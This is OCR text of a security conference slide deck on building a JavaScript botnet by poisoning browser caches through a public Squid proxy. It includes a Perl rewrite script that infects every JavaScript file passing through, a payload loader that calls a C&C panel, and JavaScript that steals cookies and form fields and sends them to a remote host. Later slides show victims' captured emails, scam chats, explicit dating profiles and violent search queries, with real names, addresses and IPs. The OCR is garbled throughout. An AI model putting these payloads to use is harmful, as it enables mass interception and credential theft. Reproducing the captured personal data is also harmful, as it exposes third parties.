Owning "bad"guys 
{and mafia} with 
Javascript botnets 


Chema Alonso & Manu "The Sur" 
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Let's do a botnet but 


We are lazy 
We haven't money 
We haven't Oday 
We aren't the FBI 
We aren't either: 

• Google 

• Apple 

• Microsoft 
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Let them to 
be infected 
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« Evil FOCA - O.l.O.O 


r~l File ^ Configuration m About 


Man in the Middle schemas 

Intercept communications between client and server 
Compromised channel ->Pwned! 

Network 

• ARP Spoofing 

• Rogue DHCP(6) 

• ICMPv6 Sppofing 

• SLAAC Attacks 
DNS Spoofing 


Evil FOCA Rulez! 



ii«f am 
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^ ^ Network 
B Neighbors 

B w 001E8CB38BDF(cubo05) 

Ml fe80::e108f04e:d799:6211 
ui 192.168.0.192 
B « 0019B974E527 

I.{a fe80;:2c52:5584;1a2bf6ab 

{«> 192.168.0.199 
B «a 001B3856979E 

m fe80::99b4:81a2:3b 19:82 
tia 192.168.0.198 
B « 5CD998BF869A 
tti 192.168.0.51 
B « 0021000522A4 

I fe80;:ddaa:3752fb02:7eb0 
^ m 192.168.0.194 
B «a C86C87%FX5 
^ iu 192.168.0.253 
B «a 001195A31F10 
^ {«■ 192.168.0.50 
B « 001CBF4D1006 
^ {«■ 192.168.0.191 


MITM IPv6 IPv4 [ DoS IPv6 | DoS IPv4 | DNS Hijacking 



/'ttacktype 

DNSHijacking 

NeighborAd vertiseme .. 


Domain; ' 

Resolve as; 1.2.3.4 

Target 1: fe80:;e108f04e:d799:6211 (8) 
Target 2: fe80::2c52;5584:1a2bf6ab (3) 


Spoofs: 96 


Route: Full 


0 

m 


Time 

17:17 

17:17 

17:18 

17:19 

17:20 

17:21 

17:22 


Module 


NeighborSpoofing 

NeighborSpoofing 


Message 

New neighbor detected with 001B38560A83 as physical address 

Performing a MITM (Neighbor spoofing) attack between fe80:;e108f04e:d799;6211 andfe80::2c5... 
Network Discovery Sending neighbor discovery packets 
Network Discovery Sending neighbor discovery packets 
Network Discovery Sending neighbor discovery packets 
Network Discovery Sending neighbor discovery packets 
Network Discovery Sending neighbor discovery packets 


□ 
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Man in the Browser 


• Plugins 

• BHO 

• Addons 

• Access to all data 

• Passwords 

• Code 

• Banking trojans 

• "A russian in my 



IE" 
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JavaScript in the Middle 

• Poisoning Browser cache 

• No permanent 

• Deleting cache means infection cleaned 

• Cached content is used if not expired 

• Allows attackers to inject remote javascript 

• Access to: 

• Cookies 

• Not HTTPOnly (more or less) 

• HTML Code 

• Form fields 

• URLs 

• Code execution 
• • • 
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Google Anal3:tics js & malware 

TrojanrJS/RedirectonGA (?) 

En^clopedia entry 

Published: Sep 30, 2010 

Aliases 

Not available 

Alert Level [7] 

Severe 

Antimalware protection details 

Microsoft recommends that you download the latest definitions to get protected. 

Detection initially created: 

Definition: 1.91.391.0 
Released: Sep 30, 2010 
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How to inject JavaScript code 


• Persistent XSS 

• Owning HTTP Servers 

• Network Man In the middle attacks 

• WiFi 

• ARP Spoofing 

• IPv6 

• Memcache attacks 

• Imagination 
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THE BPtOWSER EXPLOITATION FRAMEWORK PROJECT 


Framework to own bowser's cache 
Inject a javascript in each client 
That javaScript loads payloads from C&C 
http://beefproiect.com 

Very Well-Known 
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How to create a 
JavaScript Botnet 
from the scratch 
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TOR Nodes 



f * Tornotfo 
• • ur>oncryptod i ink 
- ^ od€ry|>lod liink 





1 

Jane 



. ■ ^ 1 

Bob 

9 
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TOR Nodes 



(=f Registro de Mensajes 




licJi feJ -r ^ ^ ® © 

GuardarTodo Guardar la selecdon Copiar Selecdonar Todos Buscar Borrar Preferendas Ayuda Cerrar 


Basic Advanced 


Hora 

Tipo 

Mensaje 


oct 0611:14:03.171 

Notice 

Opening Directory listener on 0.0.0.0:9030 

oct0611:14:03171 

Notice 

Opening Socks listener on 127.0.0.1:9050 

oct 0611:14:03.171 

Notice 

Opening Control listener on 127.0.0.1:9051 

oct 0611:14:03.282 

Notice 

Parsing GEOIP file. 

— 

oct 0611:14:23.108 

Notice 

Have tried resolving or connecting to address '[scrubbed]' at 3 different places. Giving up. 


oct 0611:15:18.772 

Notice 

Interrupt: will shut down In 30 seconds. Interrupt again to exit now. 


oct 0611:15:44.105 

Notice 

TorvO.2.1.26. This is experimental software. Do not rely on it for strong anonymity. (Running on Very recent version of Windows [major=6,minor=l] [workstation] {terminal services, singl... 


oct 0611:15:44.105 

Notice 

Initialized libevent version 1.412-stable using method Win32. Good. 


oct 0611:15:44105 

Notice 

Opening OR listener on 0.0.0.0:443 


oct 0611:15:44.106 

Notice 

Opening Directory listener on 0.0.0.0:9030 


oct 0611:15:44.106 

Notice 

Opening Socks listener on 127.0.0.1:9050 


oct 0611:15:44.106 

Notice 

Opening Control listener on 127.0.0.1:9051 


oct 0611:15:52.810 

Notice 

Guessed our IP address as 62.82159150 (source: 208.83.223.34). 


oct 0611:15:54166 

Notice 

Bootstrapped 90%: Establishing a Tor circuit. 


oct 0611:15:55.524 

Notice 

Tor has successfully opened a circuit. Looks like client functionality is working. 


oct 0611:15:55.525 

Notice 

Bootstrapped 100%: Done. 


oct 0611:15:55.548 

Notice 

Now checking whether ORPort 62.82.159.150:443 and DirPort 62.82.159.150:9030 are reachable... (this may take up to 20 minutes -- look for log messages indicating success) 


oct 0611:16:08172 

Notice 

l-la\/A friArl rAcrtk/in^ r\r /-nnnAr+inn arlrlrAce '^emiKKArlJ' af ? ^iffArAnf plar'AC im 


oct0611:18:45£43 

Notice 

lYour DNS provider gave an answer for "du.invalid", which is not supposed to exist. Apparently they are hijacking DNS failures. Trying to correct for this. We've noticed 1 possibly bad addr... 


oct 0611:18:45.683 

Notice 

Your DNS provider has given "192.168.1.101" as an answer for 11 different invalid addresses. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... 


oct 0611:19:15.659 

Notice 

Your DNS provider tried to redirect "www.yahoo.com" to a Junk address. It has done this with 3 test addresses so far. I'm going to stop being an exit node for now, since our DNS seems so... 


oct 0611:29:17.827 

Notice 

Your DNS provider gave an answer for "Ippwspkk.Invalid", which is not supposed to exist. Apparently they are hijacking DNS failures. Trying to correct for this. We've noticed 1 possibly b... 


oct 0611:29:17.893 

Notice 

Your DNS provider has given "192.168.1.101" as an answer for 11 different invalid addresses. Apparently they are hijacking DNS failures. I'll try to correct for this by treating future occurren... 


oct 0611:29:38.245 

Notice 

Have tried resolving or connecting to address '[scrubbed]' at 3 different places. Giving up. 


oct 0611:35:52.059 

Warning 

Your server (62.82.159.150:443) has not managed to confirm that its ORPort is reachable. Please check your firewalls, ports, address, /etc/hosts file; etc. 


oct 0611:35:52.071 

Warning 

Your server (62.82.159.150:9030) has not managed to confirm that its DirPort Is reachable. Please check your firewalls, ports, address, /etc/hosts file, etc. 


- 
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Not a Rocket Scince.... 
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Buy a bullet-Prof 


Not: 

• The Pirate Bay 

• Amazon 

• (Remenber Wikileaks) 

• Megaupload 



^ ^3 Schneider I ^ PC 



1 Schnoidsr Systomoinheit PC DD 
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Configure SQUID Proxy 



GET/HTTP/1.1 
Host: www.web.com 

< - 


Response 
Home.html 


GET /a.jsp HTTP/1.1 
Host: www.web.com 

< - 



GET/HTTP/1.1 
Host: www.web.com 

< - 

Response 
Home.html 

GET /a.jsp HTTP/1.1 
Host: www.web.com 

< - 


J Nueva pestana ^ 


C Q. 

☆ 

Para acceder raoidamente a una pagina. arrastrala a esta barra de marcadores. Impor... 

Chrome W... 

No has iniciado sesion en Chrome. 
fTe lo estas oerdiendo: iniciar sesion ) 

M S 

Gmail Busqueda... 

a 

YouTube 

©chrome m< 

is vish Aplicack Cerrado recientemente - 


Response 
a.jsp 



Response 
a.Jsp + pasarela.js 
include http://evil/payload.js 


GET /payload.js HTTP/1.1 
Host: evil 
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Configure SQUID Proxy 

Squid.conf: Activate URL rewrite program 


# By default^ a URL rewriter is not used. 

# 

#Default: 

# none 

url rewrite program /etc/squid/poison.pi 


.htaccess; Apache No Expiration Policy 


:/etc/squid# cat /var/www/trap/. htaccess 
ExpiresActive On 

ExpiresDefault "access plus 3000 days" 

:/etc/squid# | 
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Infect all JavaScript files 


#!/usr/bin/perl 
$ 1 = 1 ; 

$count: = 0; 

$pid = $$; 


while (<>) 

{ 

ctiomp $_; 

if ($_ =“ /(.*\.j3)/i) 

{ 

$url = $1; 

system ("/usr/bin/wget"^ "-0"^ "/var/www/tmp/$pid-$count. js"^ "■$url") ; 

system("chmod o+r /var/www/tmp/$pid-$count.js"); 

system("cat /etc/squid/pasarela.js » /var/www/tmp/$pid-$count.js"); 
print "tittp ://12 7.0.0.1: 30/ tmp / $p id-$ count. j s\n"; 

> 

else 


{ 


]■ 


print "$ \n"; 


$count++; 

1 - 
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Infect all JavaScript files 

function payload() 

{ X = document.getElementByld("poisonpayload"); 


if (x = null) 

{ 

document.write( " <3cript>function getip(j3on) { 

document.write('<3cript t\^e=\\\"application/java3cript\\\" 
3rc=\\\"http : //^^^^^^^^^^M/panel/poi3on payload.php?id=\ ' + 
j3on.ip + \ '\\\"X/3cr\'+\ ' ipt>') ; 


} ;</3cript> 


") ; 

document.write("<3cript id='poi3onpayload' t\^e='application/java3cript' 
3rc='http : //^^^^^^^^^^^/panel/j3onip .php?callbaclc=getip " x/3cript>" ) ; 


]■ 

]■ 

payload(); 
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Publish your Proxy 




vpoM 

more than just 3 roxy Proxy Solutions GET YD UR PROXY 



Home Premium Proxy Proxy List UK proxy US proxy Web Proxies Xorum 
Favourite By country By port Add new Remove FAQ RSS feed DB dump 


User: Anonymous 
[Login][R.egister/Why Join?] 


Add an Open Proxy to the Database. 

Yqu are more than welcome to add your proxies in our 
database! 


Your submission will be verified to check whether or not 
your proxies are open for public use, and only hosts 

which are current open HTTP proxies will be added to \^Iware Capacit\ Plaaiiiiig vfvfvf.VK.w\s'\ .cam. Plajuiijis 

our database. Model Available \'M Capacit>' wMi Capacit>' Manager. 

Free 3{TDay Trial 

The check process is not immediate - it may take hours 
before your proxy is listed in the full proxy list. 


Our site is not an online proxy checker. You will receive 
no feedback as to whether or not proxies in your 
submittion are valid HTTP proxies. 

However submitting quality proxylists you can get an 
elite user status which gives you special level access to 
our database and Xorum. 


AdChoices ^ 
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Let Internet do the magic 



Busqueda 




Todo 

Imagenes 

Maps 


Whois info 

WWW xroxy com/whois1902391 htm - Traducir esta pagina 
13 Feb 2012 - Xroxy proxy lists, xorum forums, and we b proxy serv ice • Paid Proxy ... 
can find Whois Information for the following IP address: 


Videos 

Noticias 

Shopping 


- Simple Proxy List - IP Info 


WWW simpleproxylist com/info, php?. 


Proxy: I 


154:31337. Hostname 



- Traducir esta pagina 
.startdedicated.com. Added: 02/12/12 


(m/d/y) Status; Offline Country: Germany City: ? Last online: Fri Feb 24 ... 
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Do Payloads: Cookie stealing 


document.writeC' 

<img id='domaingrabber' src='http://X.X.X.X/panel/ 
domaingrabber.php?id=0.0.0.0& 
domain="+document.domain+"& 
location="+document.location+"& 
cookie="+document.cookie+"' style='display:none;7>"); 
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Do Payloads: Form fields stealing 

function IcLogStart () 

{ 

var forms = parent.document.getEleraentsByTagName("form"); 
for (i = 0 ; i < forms.length; i++] 

{ 

forms[i].addEventListener('submit \ function() { 

var cadena = 

var forms = parent.document.getElementsByTagName("form"); 
for (x = 0 ; X < forms.length; x++) 

var elements = forms[x].elements; 
for (e = 0 ; e < elements.length; e++) 

{ 

cadena += elements[e].name + "%3d" + elements[e].value + "| 

> 

1 - 

attachForm(cadena); 

} r false); 

> 

1 - 
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Who •"$”•$ is using 
this kind of services? 
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Mafias: Help the Prince 



ROXal bank 

of 

NIGERIA 


I have emailed eveiryone 
I can possibly find, my Prince, 
but no-one \Nants to help 
you move youir money. 


AGENT-X COMICS ^ 


WWW. AGEN T-X.COM. AU 
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QiLcom 


Search 


Mail 


Web 


Conn pose Mail 


E-Mail 

iB Inbox 


royalhotelenglandfiihotmail.co.uk 
Mail Collector 


L® Spam 

l3l Drafts (1) 
@ Sent(3) 
^ Trash 


Q Saved I Ms 



Mafias: Nigerian Scammers 


mail.com Home 


gsent (3/40) 


^Re; FOR YOUR KIND 



Forward 

Resend Delete Move To 

^ More Actions 




# 


0 

o 

To 

Subject 

Date ▼ 

Size I 

35 

□ 

# 


wasi m_butt94(iiya hoo .co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

12/20/11 

104 KB 


□ 



Bikash Thapa 

SEND THIS APPLICATION LETTER TO ZONAL COORDINATORS 

12/15/11 

3 KB 


□ 



Bikash Thapa 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTORS 

12/15/11 

36 KB 


□ 



meena anam 

THIS IS HOW YOU WILL SEND APPLICATION LETTER TO ZONAL COORDINATORS 

12/15/11 

3 KB 


□ 



meena anam 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

12/15/11 

36 KB 


□ 

# 


h a rish . bad ha n @y a ho o .co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

12/10/11 

100 KB 


□ 

# 


yo usaf_si m ba 0 hotm a i 1 .co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

12/03/11 

103 KB 


□ 



naveed shahid 

SEND PAYMENT NOW SO WE WILL SEND YOUR WORK PERMIT CERT IMMEDIATELY FROM ... 

12/01/11 

4 KB 


□ 

# 


n ave e d_sh a h i d 9 7 @ya hoo . co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

11/23/11 

104 KB 


□ 

# 


saima_ahsan20@hotmail.com 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

10/0S/ll 

103 KB 


□ 

# 


amirbba715@gmail.com 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/22/11 

104 KB 


□ 

# 


wasi m_butt94@ya hoo .co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/20/11 

103 KB 


□ 



MUHAMMAD YASIR 

GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE 

09/19/11 

2 KB 


□ 

# 


MUHAMMAD YASIR 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/19/11 

102 KB 


□ 



asghar shahid 

GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE P... 

09/16/11 

2 KB 


□ 

# 


thiruc20@gmail.com 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/16/11 

102 KB 


□ 

# 


asghar shahid 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/11/11 

101 KB 


□ 

# 


e n g 1 a n d roya lyo rkhote 1 @ya hoo.... 

Fw: FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/11/11 

103 KB 


□ 

# 


subukshakir@hotmail.com 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/06/11 

101 KB 

□ 

# 


d h a ra m .ve rm a 2 5 @ g m a i 1 .co m 

FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR 

09/03/11 

101 KB 


Informatica 

www.informatica64.co 
































Mafias: Nigerian Scammers 


fit mail.com Home i |jj Sent (3/46) _ i ^Re; FOR YOUR KIND X [ ^ GENTLY UNDERSTAh >, | ^ FROM BRITISH IMMI x\^ 

Forward ^ Resend [g Delete Q Move To ^ More Actions 



UK Immigration Work Permit and Visa Services 

Our Duty is to provide you with a working permit from the UKBA and your firm suporting documents. ENTRANCE WORK PERMIT as requested by 
the immigration department to enahie your compietement required documents and possible approvai entry visa to be issued at the British high 
commissioner in your country ,you are required to reach us with your passport scanning pages, with two passport photograph EU size along with 
your processing fee of GB £275 Pounds before we couid issue of your ENTRANCE CLEARANCE WORK PERMIT from our office. On receipt of these:- 
Ca)Your passport scanning pages> 

(b) Two passport recent photographs 

(c) Fiiied candidate payment form with processing fee of GB £275 pounds 

We wiii to assist to forward aii your detaiis to British LABOUR DEPARTMENT for processing of your entry working permit certificate as requested 
by the immigration department which wiil guarantee the issuance of your four 4-years entry working visa at the British embassy in your country 
of residence . As soon as we received from you , your request wili be process and issued within 48-HRS; 


This are generaiiy mentioned in the prospectus of the Employment/Tourist tour or invitation by any UK company management for ,and immediateiy 
your documents is approved admission in that particuiar institute wili qualify him or her for entrance ciearance entry working permit. 


INFORMATION METHOD OF PAYMENT 

You should reach us with your payment through the means western union money transfer or money -gram money transfer bank and print out the 
candidate payment form to fiii with the payment transfer informations from the western union , scan and send back to our office with:- 
(i) Passport scanning pages ,(ii) Two recent passport photographs aiong with the (iii) Fiiled candidate payment form for processing and issuing of 
your entrance ciearance work permit iabour from our office .Attached fiie is contained your appiication candidate payment form for entry 
ciearance work permit certificate and make payment through the western union money transfer to Accountant Receiver Name: (Mr Addison 
Stuart) Address: 80-83 Long Lane,EClA 9ET London U.K 

Then print out the candidate payment form to fiii,scan and send your passport scanned pages aiong with two passport photographs for immediate 
p rocessi ng a n d issu i ng of yo u r req uest fro m o u r office with i n - 4 8 Ho u rs 
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Mafias: Nigerian Scammers 


mail.com Home 


LQSent (3/40) 


j 1^ Re: 



FOR YOUR KIND X 


X. 


Check Mail P Reply Cg Forward ©Spam [g Delete Q Re; FOR YOUR KIND ATTENTION ^ 


khem raj puri 


[ Close fullscreen"^ 


Re: FOR YOUR KIND ATTENTION 

"khem raj puri" <krajpuri@yahoo.com> 

To: britishlawyersworkpmt@ienglandmail.com 


09/01/11 06:47 AM B Less info 

^ @ 


Dear Sir 

I respected your kindly information for me about that job. But at that time my group clients are not to belewe me for deposite that amount. So after grv^en to 
the clearance paper then they are possible and beleh^ to pa}'mentfor me. 


We can not send you money through Western or Bank, Because our government can not gh^e us to permission. If you are agree then only one way to send that 
amount m our Nepalase UK Embassy through your hand. 


Otherwise it is not possible to do for further processed then relase the task. 


Thanking about me 


Regards 
Khem Raj Puri 
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Mafias: Nigerian Scammers 
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NICl.jpg 


Appiciation form.jpg 



. '1^';:-... Ill 


_i ‘ - . _ . ' J. 

1 , , 


Tipo: Imagen JPEG 

i' —----- - j 

73 

Tamano: 73,5 KB 


'3 

Fecha de modificacion: 20/08/2011 23:02 

p A • ■ TT aAi ^ J" ' 
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Picture 058.jpg 


Picture059.jpg 
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Mafias: Nigerian Scammers 



Picturejpg ROYAL YORK HOTEL RECOMMENDATION JOB 

OFFER ACCEPTANCE SUP JPG 


Informatica 

www.informatica64.corn 































Manas: Predators 


meeta 

where sin^lea meet 


IBl Profile 


ED Messages 


0 Matches 


<3, Members ^ Groups 


Forums 



home search updates account logout 


Home 


Hf 

travelgirls 




Axionqueen 


Age: early 30's 
Location: Keller, Texas 
Gender: female 

Looking for: dating / a relationship 

Interested in: men 
Member since: 3 months ago 
Relationship status: Single 


Hair color: Black 

Eye color: Brown 

ReFigion: Christian 

Ethnicity: a si a 

Occupation: baby sitter 

Wants children? Depends on what partner 

wants 


About Axionqueen 

AM LOOKING FOR A VERY STRAIGHT FORWARD AND WELL UNDERSTAND MAN TO BE MY 
SOUL MATE AND HE AS TO BE VERY HARD WORKING AND READY FOR A LONG TIME 
RELATIONSHIP WITH ME AND ALSO HAVE A GOOD HIGH SEX DRIVE AND HE AS TO BE 
DISEASE FREE AND VERY CLEAN AND VERY HONEST, LOVING, CARING, DOMINANT, 
PASSIONATE AND BE A MAN OF IS WORDS AND READY TO TRY NEW THINGS WITH ME AND 
LOVE EATING MY PUSSY AND TAKING ME FROM THE ASS ALWAYS AND ALSO LET ME HAVE 
THE LAST DROP OF IS CUM IN MY MOUTH FOR MY OWN GREAT DESIRED 
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Mafias: Predators 


HaveAFling 

Find your Kiwi Fling 0 


Messages Profile Settings Credits Logout 


Search: Age 



is hrSnieo hr 




Auckland 



Q Send Message 


Axionqueen 

Single seeking males for serious relationships then marriage 
Lives in Auckland, New Zealand 


Recent Activities 


Last login 22 min ago 


Age 
Gender 
Zodiac Sign 


31 

Female 

Aries 


Self Introduction 


Languages Spoken 

Weight 

Height 


AM A VERY COOL HEADED AND EASY GOING LADY AND AM 
CARING.LOVING,OPEN MINDED.HONE3T.PA33IONATE.HARD 
WORKING AND AM DOWN TO HEART PERSON AND I HATE 
CHEATING OR LIES AND AM WHO I CALL MY SELF.I LIKE COOKING 
AND GETTING MY ENVIRONMENT CLEAN ALWAYS AND I LIKE GOING 
SHOPPING,CAMPING,SWIMMING.FISHING AND AM 

English 

60 kg - Average/Medium 
174 cm {5' Bl 
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Mafias: Predators 



Home I Top Charts | Search | Who's Online? | Interested in you 
Profile I Mailbox | Favorites | You're interested in.. | Invite a friend 

Translator 

PlanetaLove USA 

Your profile has been viewed 1 times 5 people interested in you! 

Average rating: 10,00 (1 votes) 

There are 42 new users! 

There is 2 online users! 

^ - _5 I If \ r X I I _ ^ M _ ^ ^ ^ - 



Welcome axionqueen | Logout 



USER PROFILE 

Username: axionqueen 
Age: 31 

Gender: Female 
Location: Lynchburg, 
Virginia, United States 
Looking for a man 
between: 39 and 60 years 
Last Online: online now 



• Subscription 


Average Rating: 10.00 (1 
votes) 


I am: 

Attractive, Pretty, Sexy, Sensual, 
Affectionate 

I like: 

Stay with my family. Helping 
people. Walking, Dancing, 
Reading 

I'm looking for: 

A special man. Love, A man who 
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Mafias: Predators 


JTr-v"— 

0 0,49 

Sf Status joyandreas32 

V' 



Q Ubersicht Eib Profil Q Mailbox C-. Freunde 

Mail verfassen Suche 

0 



0 Freunde online m42Thorsten Sorry aberich v/ei& nic... 16.02.12- 10:08 Q 

d Freunde werben 


Profil Verlauf Details 1 Freund Gruppen Foto Ticker Gastebuch 


w32joyandreas32 V ^ Mein Profil 

Name unbekannt 

o Loschen Verwalten ^ Mitglieder kennzeichnen ^ Bewertung aktivieren Hochladen 
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Mafias: Predators 



kkbill1980[12:09:40 [UTC)):Hello sweetie 
fiat176punto[12:12:49 [UTC)):Hello my sweet Mous 
kkbill1980[12:13:00 [UTC)):how are you doinf sweetie 
fiat176punto{12:13:16 [UTC)):doinf ??? 

kkbill1980[12:13:52 [UTC)):what am fine i just came back from the booking office and my love when did you really want me to come 

fiat176punto[12:15:38 (UTC)):I want it that You come to me 

fiat176punto[12:15:51 [UTC)):why what is the Problem 

kkbill1980[12:16:03 [UTC)):when did u want me to come next week or what ? 

fiat176punto(12:16::48 [UTC)):I dont now what is the best about you 

kkbill1980[12:17::08 (UTC)):no problem am just asking to know the date i will choose to book the flight ticket and all i need to get all my papers with the flight ticket book it will cost me 700euro 
flat176punto{12:17:11 [UTC)):when is the best Day for Fly 

kkbill1980[12:17:34 [UTC)}:am ready to fly anytime so far you are ready to have me with you my love 
flat176punto[12:18:33 [UTC)):Year thats fine so I thing you can look for Wendsday 
fiat176punto[12:19:11 [UTC}):When its no Problem for you 
kkbill1980[12:20:16 [UTC)):okay that is good 
fiat176punto{12:20;21 [UTC)):Baby You have my Address now 

kkbill1980[12;20:54 [UTC)}:and when did you think you can get the 700euro send so that i can make the booking and get everything ready for me to fly down to germany 
fiat176punto[12:22:05 [UTC)):Baby You have my Address now 
fiat176punto[12:22:15 [UTC)):??? 

kkbill1980[12:22:18 [UTC)):i will send you the full nicked pics tonight 
fiat176punto[12:23:11 [UTC)):oh Baby this is nice 

kkbill1980[12:23:16 [UTC)):when did you think you will have chance to go and send me the 700euro for the booking so that i will get everything ready 
fiat176punto[12:24::57 [UTC)):The pictures are so tht I can see your all Pircings ??? 

kkbill1980[12:25::18 (UTC)):i will send you my full information so that you can use it to send the money from western union to me okay 
fiat176punto[12:25:49 [UTC)):yes Baby when You sen the Pic You can send me were I must Take the Money 
kkbilH980(12:26:16 [UTC)):sorry i dont understand you my love 

fiat176punto[12:27:T7 [UTC)):When You send The Pictures to night You can sent me the Western Union Information 

kkbill1980[12:27:58 [UTC)):ich frage Sie, dass, wenn Sie Zeit haben, urn zu gehen und senden Sie mir die 700 €, so dass ich die Buchung kann tun und alles bereit 


kkbill1980[12:30:15 [UTC)):are you there 
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Mafias: Predators 


Mail 

Contacts 

Calendar 

Notepad 


What's Hew? - Mobile Mail - Options^ 


Check Mail Mew ▼ 


Q western union 


Mail Search 


Get the newest Yahoo! Mail 


R«Fin« Results 


Sender 

curti.sgipson96 (35) 
achim-dudziak-1962(ishotma 
Kayla Bill (18) 

Andreas Kdchling (11) 
fiatl76punto (9) 

► View all 31 senders 


Folders 

(iiC@Chats (129) 
Sent (18) 

Inbox (11) 


Dates 

2012 (61) 
2011 (97) 


Message Status 
Read (158) 

I Infl-annarl f 1 ^ "7 ^ 


Search Results 1 -25 of 158 messages for western union 


5^ M-essage View | Sg| Photo View | Attachment Vig^^ri ^ 


First I Previous | Next | Last 


i 


□ 



Delete I Spam 


Mark’^ 


Move... 


From 


Subject 


Date 


□ 


Kayla Bill Re; Schatz I love you big Kiss 

...and what is your bank manager with sending money if you are truthful 
and look for a western union shop to send it or you just forget about it 
heart — On Wed. 2/29/12, Josef Landhuis... 


9:27 PM 


Sent 


collect the money from your bank 
and stop playing game with my 


o 


Kayla Bill Re: 

...and what is your bank manager with sending money if you are truthful 
and look for a western union shop to send it or you just forget about it 
heart — On Wed, 2/29/12, Josef Landhuis... 


9:20 PM Sent 

collect the money from your bank 
and stop playing game with my 


□ 


Josef Landhuis [ No Subject ] 

...and what is your bank manager with sending money if you are truthful 
and look for a western union shop to send it or you just forget about it 


4:29 PM 

collect the money from your bank 
and stop playing game with my 
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Mafias: Predators 


Von: Kayla Bill 

Betreff: Re: Schatz I lo ve you big Kiss 
An: 'Josef Landhuis' 

Datum: Donnerstag, 23. Februar, 2012 07:10 Uhr 

Hello sweetie why you have not sent me the nicked pics you promise me ?and i just sent you my nicked pics and please dont show it to another person is for 
only your eyes okay i love you and i will be waiting to chat with you when you come online today i miss you and last night my net was bad that is why i did 
not come online last night and i have also send you my info for the western union 


From: Josof Landhuis 
Subject: Re: Sch atz: I love you big Kiss 
To: 'Kayla Bill' 

Date: Wednesday, February 2S, 2C12, 4:C5 AM 
hello Baby 

I dont no but but my Bankmanager ask me that the Address City and country is not pasibel now what we can do ??? 
gime a athoer one piease 

Your love Josef big Kiss Baby 


Von: Kayla Bill 
Betreff: Re: Schatz I 
An: Landhuis' 

Datum: Mittwoch, 29. Februar, 2012 14:43 Uhr 

fuck it stop playing game on me i gave you my right address and what is your bank manager with sending money if you are truthful collect the money from 
look for a western union shop to send it or you Just forget about it and stop playing game with my heart 


n 

r bank and ^ 
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Dog Scammers 








\/|finLif flll^ 







V icm 1 


KTV8111403Charming Registered Yorkshire ... 5200.00 Start: 2/29/2012 Exp: 3/30/2012Active 


Online Preview 

Edit Details 

@ Edit Photos 

EditUpsells 

^ Renew 

^ Close 

Clone 


3l ALA8111380 Charming Registered Yorkshire ... 5200.00 Start: 2/29/2012 Exp: 3/30/2012Active 


[> Online Preview 

Edit Details 

@ Edit Photos 

[ EditUpsells 

^ Renew 

^ Close 

(§] Clone 

3 ALA8111363Charming Registered Yorkshire ... 

5200.00 Start: 2/29/2012 Exp: 3/30/2012Active 

Online Preview 

Edit Details 

@ Edit Photos 

1 EditUpsells 

^ Renew 

Close 

(§] Clone 

3 ALA.8111332 Charming Registered Yorkshire ... 

5200.00 Start: 2/29/2012 Exp: 3/30/2012Active 

[) Online Preview 

1^ Edit Details 

@ Edit Photos 

EditUpsells 

^ Renew 

^ Close 

(§] Clone 


3 NJC8111331 Charming Registered Yorkshire ... 5200.00 Start: 2/29/2012 Exp: 3/30/2012Active 


Online Preview 

Edit Details 

@ Edit Photos 

M EditUpsells 

___; 

^ Renew 

^ Close 

Clone 
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Warning! This 
picture could hurt 
your emotions... 
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Dog Scammers 

Category: For Sale - Free Stuff, Freebies, & Bargains 
Views: 7 


Start Date: 2/29/2012 
Price: $200.00 


Find Similar Listings 


Free Stuff, Freebies, & Bargains 


Go! 


^ Create Alert 


Meet the Advertiser 

Ask Advertiser a Question 
View More from this Advertiser 
Feedback: jessicabrownl2 

Other Options 

Watch This Ad 
Clip This Ad / View Clip List 
Email to a Friend 
Report As Inappropriate 
Q ShareThis 
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Psychotics 


^ 190.90.26.169 

’'kJeD.xnxx.cDm 

k= Mother 
=Search 

^ 190.90.26.169 

vkJeD.xnxx.com 

k= Rape sister 



=Search 

^ 190.90.26.169 

Vi Vp Vi’.xnxx.cDm 

k=ViDlent rape 



=Search 


190.90.26.169 vkJeD.xnxx.com 


k=ViDlence 
=Search 


CDmment= 
=Submit 
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Annonymous 




[+] [-] whatisrnyipaddress.cDm 


i^iir^Ji rM^ m n ^ ^ nr- -*11 - a 


195.37.2S4.30 


hkJeme.m 




IC-lwiJ-LIU-.- D- ■ 

q= 

sa=Search 


server[2]=rand 

ip[2]=rand 

url[3]=http:// 

name[3]=[a9aa[ea gaeeaaee 

server[3]=rand 

ip[3]=rand 

url[4]=http:// 

name[4]=ia5aaiea fae&aaee 

server[4]=rand 

ip[4]=rand 

fvm=1 

fvm=2 

1vm=3 

demo ^^-viktD ria.dju@vandex.ru 

__ % n % V _ nx.. 

=lDidaaeDU eia 
q=Mene 
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Rare people in a rare World 

Your current baLance represents how active your invoLvement in our service has been up to now. Summary stated beLow. 

■ Since joining up, you have accumuLated a totai of $24.38 

■ You have not redeemed yet 

■ You do not qualify for redemption yet due to insufficient balance 
Displaying 1 to 20 of 383 articles on page 1 of 20 

Culinary Traditions Of France Gourmet &0.05 2/29/2012 2/29/2012 2/29/2012 

1:42:42 PM 1:43:41 PM 1:44:32 PM 


Why Network Marketing Sucks Networking S0.05 2/29/2012 2/29/2012 2/29/2012 

1:41:46 PM 1:42:41 PM 1:43:35 PM 


Black Christmas movie review 

Movies 

S0.06 

2/29/2012 

1:40:28 PM 

2/29/2012 

1:41:45 PM 

2/29/2012 

1: 42:35 PM 

